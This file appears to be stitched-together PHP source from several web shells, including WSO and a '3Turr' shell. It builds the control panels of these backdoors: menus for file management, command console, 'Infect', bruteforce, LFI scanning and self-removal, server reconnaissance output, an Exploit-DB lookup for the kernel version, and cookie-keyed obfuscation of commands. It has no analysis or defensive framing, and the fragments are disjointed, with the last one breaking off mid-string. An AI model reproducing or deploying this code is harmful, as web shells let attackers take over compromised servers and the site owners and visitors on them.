function eZSetupPrvPosixExtension() { $userInfo = array('has_extension' => false); if (extension_loaded('posix')) { $userInfo['has_extension'] = true; $uinfo = posix_getpwuid(posix_getuid()); $ginfo = posix_getgrgid(posix_getgid()); $userInfo['user_name'] = $uinfo['name']; $userInfo['user_id'] = $uinfo['uid']; $userInfo['group_name'] = $ginfo['name']; $userInfo['group_id'] = $ginfo['gid']; $userInfo['group_members'] = $ginfo['members']; $userInfo['script_user_id'] = getmyuid(); $userInfo['script_group_id'] = getmygid(); } return $userInfo; }
function wsoHeader() { if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION . "</title> \n<style> \nbody {background-color:#000;color:#fff;} \nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } \nspan,h1,a{ color: {$color} !important; } \nspan{ font-weight: bolder; } \nh1{ border:1px solid {$color};padding: 2px 5px;font: 14pt Verdana;margin:0px; } \ndiv.content{ padding: 5px;margin-left:5px;} \na{ text-decoration:none; } \na:hover{ background:#ff0000; } \n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } \n.bigarea{ width:100%;height:250px; } \ninput, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; } \nform{ margin:0px; } \n#toolsTbl{ text-align:center; } \n.toolsInp{ width: 80%; } \n.main th{text-align:left;} \n.main tr:hover{background-color:#5e5e5e;} \n.main td, th{vertical-align:middle;} \npre{font-family:Courier,Monospace;} \n#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} \n</style> \n<script> \n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; \n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "'; \n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "'; \n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "'; \n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "'; \n var d = document; \n function set(a,c,p1,p2,p3,charset) { \n if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; \n if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; \n if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; \n if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; \n if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; \n if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; \n } \n function g(a,c,p1,p2,p3,charset) { \n set(a,c,p1,p2,p3,charset); \n d.mf.submit(); \n } \n function a(a,c,p1,p2,p3,charset) { \n set(a,c,p1,p2,p3,charset); \n var params = 'ajax=true'; \n for(i=0;i<d.mf.elements.length;i++) \n params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); \n sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params); \n } \n function sr(url, params) { \n if (window.XMLHttpRequest) \n req = new XMLHttpRequest(); \n else if (window.ActiveXObject) \n req = new ActiveXObject('Microsoft.XMLHTTP'); \n if (req) { \n req.onreadystatechange = processReqChange; \n req.open('POST', url, true); \n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); \n req.send(params); \n } \n } \n function processReqChange() { \n if( (req.readyState == 4) ) \n if(req.status == 200) { \n var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); \n var arr=reg.exec(req.responseText); \n eval(arr[2].substr(0, arr[1])); \n } else alert('Request error!'); \n } \n</script> \n<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'> \n<form method=post name=mf style='display:none;'> \n<input type=hidden name=a> \n<input type=hidden name=c> \n<input type=hidden name=p1> \n<input type=hidden name=p2> \n \n<input type=hidden name=p3> \n<input type=hidden name=charset> \n</form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname('r'); $kernel = @php_uname('s'); if (!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . '/'; } $cwd_links .= "\")'>" . $path[$i] . "/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; } $m = array('Sec Info' => 'SecInfo', 'Files' => 'FilesMan', 'Exec' => 'Console', 'Sql' => 'Sql', 'PHP Tools' => 'phptools', 'LFI' => 'lfiscan', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'XSS Shell' => 'XSSShell', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[<a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a>]</th>'; } $drives = ""; if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } } } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; }
function hardHeader() { if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['▜']; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION . "</title>\n<style>\n\tbody {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}\n\tbody,td,th\t{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}\n\ttable.info\t{color:#C3C3C3;background-color: #060A10;}\n\ttable#toolsTbl {background-color: #060A10;}\n\tspan,h1,a\t{color:#fff !important;}\n\tspan\t\t{font-weight:bolder;}\n\th1\t\t\t{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#060a10;}\n\ta\t\t\t{text-decoration:none;}\n\ta:hover\t\t{text-decoration:underline;}\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\n\t.ml1\t\t{border:1px solid #1e252f;padding:5px;margin:0;overflow:auto;}\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#1e252f;border:none;font:9pt Courier New;outline:none;}\n\tlabel {position:relative}\n\tlabel:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\n\tlabel:before {content:'';right:0; top:0;width:17px; height:17px;background:#1e252f;position:absolute;pointer-events:none;display:block;}\n\tform\t\t{margin:0px;}\n\t#toolsTbl\t{text-align:center;}\n\t#fak \t\t{background:none;}\n\t#fak td \t{padding:5px 0 0 0;}\n\tiframe\t\t{border:1px solid #060a10;}\n\t.toolsInp\t{width:300px}\n\t.main th\t{text-align:left;background-color:#060a10;}\n\t.main tr:hover{background-color:#354252;}\n\t.main td, th{vertical-align:middle;}\n\tinput[type='submit']{background-color:#2E6E9C;}\n\tinput[type='button']{background-color:#2E6E9C;}\n\tinput[type='submit']:hover{background-color:#56AD15;}\n\tinput[type='button']:hover{background-color:#56AD15;}\n\t.l1\t\t\t{background-color:#1e252f;}\n\tpre\t\t\t{font:9pt Courier New;}\n</style>\n<script>\n var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n var d = document;\n\t\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\n\tfunction utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\n\tfunction base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\td.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER['HTTP_HOST']) . "key"] . "');\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}\n\tfunction a(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\tvar params = 'ajax=true';\n\t\tfor(i=0;i<d.mf.elements.length;i++)\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\n\t\tsr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);\n\t}\n\tfunction sr(url, params) {\n\t\tif (window.XMLHttpRequest)\n\t\t\treq = new XMLHttpRequest();\n\t\telse if (window.ActiveXObject)\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\n if (req) {\n req.onreadystatechange = processReqChange;\n req.open('POST', url, true);\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\n req.send(params);\n }\n\t}\n\tfunction processReqChange() {\n\t\tif( (req.readyState == 4) )\n\t\t\tif(req.status == 200) {\n\t\t\t\tvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');\n\t\t\t\tvar arr=reg.exec(req.responseText);\n\t\t\t\teval(arr[2].substr(0, arr[1]));\n\t\t\t} else alert('Request error!');\n\t}\n</script>\n<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>\n<form method=post name=mf style='display:none;'>\n<input type=hidden name=a>\n<input type=hidden name=c>\n<input type=hidden name=p1>\n<input type=hidden name=p2>\n<input type=hidden name=p3>\n<input type=hidden name=charset>\n</form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } if (!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . '/'; } $cwd_links .= "\")'>" . $path[$i] . "/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach ($charsets as $▟) { $opt_charsets .= '<option value="' . $▟ . '" ' . ($_POST['charset'] == $▟ ? 'selected' : '') . '>' . $▟ . '</option>'; } $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Infect' => 'Infect', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); if (!empty($GLOBALS['▛'])) { $m['Logout'] = 'Logout'; } $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach ($m as $k => $v) { $menu .= '<th>[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; } $drives = ""; if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } } } /* (С) 08.2015 dmkcv */ echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q=' . urlencode(@php_uname()) . '" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=#FFDB5F><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' (' . round(100 / ($totalSpace / $freeSpace), 2) . '%)<br>' . $cwd_links . ' ' . viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">' . $opt_charsets . '</select></label><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; }
function stream_stat() { return array(0, 0, 0, 0, getmyuid(), getmygid(), 0, strlen($GLOBALS[$this->varname]), time(), time(), time(), -1, -1); }
echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; echo ws(3) . $sysctl . "<br>"; echo ws(3) . ex('echo $OSTYPE') . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; if (!empty($id)) { echo ws(3) . $id . "<br>"; } else { if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )<br>'; } else { echo ws(3) . "user="******" uid=" . @getmyuid() . " gid=" . @getmygid() . "<br>"; } } echo ws(3) . $dir; echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )'; echo "</b></font>"; } else { echo '<font color=blue><b>OS :' . ws(1) . '<br>Server :' . ws(1) . '<br>User :'******'<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; echo ws(3) . @getenv("USERNAME") . "<br>"; echo ws(3) . $dir; echo "<br></font>"; }
function yemenhead() { if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace ? $totalSpace : 1; $on = "<font color=#0F0> ON </font>"; $of = "<font color=red> OFF </font>"; $none = "<font color=#0F0> NONE </font>"; if (function_exists('curl_version')) { $curl = $on; } else { $curl = $of; } if (function_exists('mysql_get_client_info')) { $mysql = $on; } else { $mysql = $of; } if (function_exists('mssql_connect')) { $mssql = $on; } else { $mssql = $of; } if (function_exists('pg_connect')) { $pg = $on; } else { $pg = $of; } if (function_exists('oci_connect')) { $or = $on; } else { $or = $of; } if (@ini_get('disable_functions')) { $disfun = '<span>Disabled functions : </span><font color=red style="word-wrap: break-word;width: 80%; " >' . @str_replace(',', ', ', @ini_get('disable_functions')) . '</font>'; } else { $disfun = "<span>Disabled Functions: </span><font color=#00ff00 >All Functions Enable</font>"; } if (@ini_get('safe_mode')) { $safe_modes = "<font color=red>ON</font>"; } else { $safe_modes = "<font color=#0F0 >OFF</font>"; } if (@ini_get('open_basedir')) { $open_b = @ini_get('open_basedir'); } else { $open_b = $none; } if (@ini_get('safe_mode_exec_dir')) { $safe_exe = @ini_get('safe_mode_exec_dir'); } else { $safe_exe = $none; } if (@ini_get('safe_mode_include_dir')) { $safe_include = @ini_get('safe_mode_include_dir'); } else { $safe_include = $none; } if (!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . '/'; } $cwd_links .= "\")'>" . $path[$i] . "/</a>"; } $drives = ""; foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . base64_encode($drive . ':/') . '\')">[ ' . $drive . ' ]</a> '; } } echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>3Turr ~ Sh3ll</title> <link rel="shortcut icon" type="image/x-icon" href="https://avatars1.githubusercontent.com/u/13343571?v=3&s=460"> <script language="javascript"> function Encoder(name) { var e = document.getElementById(name); e.value = btoa(e.value); return true; } function Encoder2(name) { var e = document.getElementById(name); e.value = btoa(e.value); return true; } </script> <style type="text/css"> <!-- .headera { color: red; } .whole { height:auto; width: auto; margin-top: 10px; margin-right: 10px; margin-left: 10px; background-image: linear-gradient( rgba(0, 0, 0, 0.4), rgba(0, 0, 0, 0.4) ), url(http://img03.arabsh.com/uploads/image/2012/09/11/0d37424266f70d.png); } .header { table-layout: fixed; height: auto; width: auto; border: 4px solid #5BEEFF; color: yellow; font-size: 12px; font-family: Verdana, Geneva, sans-serif; } tr { display: table-row; vertical-align: inherit; padding-right:10px; }table { display: table; border-collapse: separate; border-spacing: 2px; border-color: #5BEEFF; } .header a {color:#0F0; text-decoration:none;} span { font-weight: bolder; color: #FFF; } #meunlist { font-family: Verdana, Geneva, sans-serif; color: #FFF; background-color: #000; width: auto; border-right-width: 7px; border-left-width: 7px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-color: #5BEEFF; height: auto; font-size: 12px; font-weight: bold; border-top-width: 0px; } .whole #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; } .whole #meunlist li { margin: 0px; padding: 0px; display: inline; } .whole #meunlist a { font-family: arial, sans-serif; font-size: 14px; text-decoration:none; font-weight: bold; color: #fff; clear: both; width: 100px; margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; border-right-width: 1px; border-right-style: solid; border-right-color: #FFF; } .whole #meunlist a:hover { color: red; background: #fff; } .menu a:hover { background:#5BEEFF;} a:hover { color:red;background:black;} .ml1 { border:1px solid #2438CF;padding:5px;margin:0;overflow: auto; } .bigarea { width:100%;height:250px; border:1px solid red; background:#171717;} input, textarea, select { margin:0;color:#FF0000;background-color:#000;border:1px solid #5BEEFF; font: 9pt Monospace,"Times New roman"; } form { margin:0px; } #toolsTbl { text-align:center; } .toolsInp { width: 80%; } .main th {text-align:left;background-color:#990000;color:white;} .main td, th{vertical-align:middle;} pre {font-family:Courier,Monospace;} #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} }'; if (is_writable($GLOBALS['cwd'])) { echo ".foottable {\n width: 300px;\n font-weight: bold;\n }"; } else { echo ".foottable {\n width: 300px;\n font-weight: bold;\n background-color:red;\n }\n .dir {\n background-color:red; \n }\n "; } echo '.main th{text-align:left;} .main a{color: #FFF;} .main tr:hover{background-color:red;} .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:99%; height:300px; } </style> '; echo "<script>\n var c_ = '" . base64_encode(htmlspecialchars($GLOBALS['cwd'])) . "';\n var a_ = '" . htmlspecialchars(@$_POST['a']) . "'\n var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';\n var p1_ = '" . (strpos(@$_POST['p1'], "\n") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';\n var p2_ = '" . (strpos(@$_POST['p2'], "\n") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';\n var p3_ = '" . (strpos(@$_POST['p3'], "\n") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';\n var d = document;\n\tfunction set(a,c,p1,p2,p3,charset) {\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\t}\n\tfunction g(a,c,p1,p2,p3,charset) {\n\t\tset(a,c,p1,p2,p3,charset);\n\t\td.mf.submit();\n\t}</script>"; echo ' </head> <div class="whole1"></div> <body bgcolor="#000000" color="red" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <div style="position:absolute;top:30px;right:50px; font-size:25px;font-family:auto;z-index:-1;" rowspan="8"><font color=red><img height="190px" height="190px" alt="3Turr" src="http://i.imgur.com/mVdgU0V.png" /></font><center><font style="color:#5BEEFF;text-shadow: 1px 1px 36px #5BEEFF, 0 0 25px #5BEEFF, 0 0 30px #5BEEFF, 0 0 30px #5BEEFF;">3</font><font style="color:red;text-shadow: 1px 1px 36px red, 0 0 25px red, 0 0 30px red;">Turr</font> </div> <div class="whole"> <form method=post name=mf style="display:none;"> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form> <div class="header"><table class="headmain" width="100%" border="0" align="lift"> <tr> <td width="3%"><span>Uname:</span></td> <td colspan="2">' . substr(@php_uname(), 0, 120) . '</td> </tr> <tr> <td><span>User:</span></td> <td>' . $uid . ' [ ' . $user . ' ] <span> Group: </span>' . $gid . ' [ ' . $group . ' ] </tr> <tr> <td><span>PHP:</span></td> <td>' . @phpversion() . ' <span> Safe Mode: ' . $safe_modes . '</span></td> </tr> <tr> <td><span>IP:</span></td> <td>' . @$_SERVER["SERVER_ADDR"] . ' <span>Server IP:</span> ' . 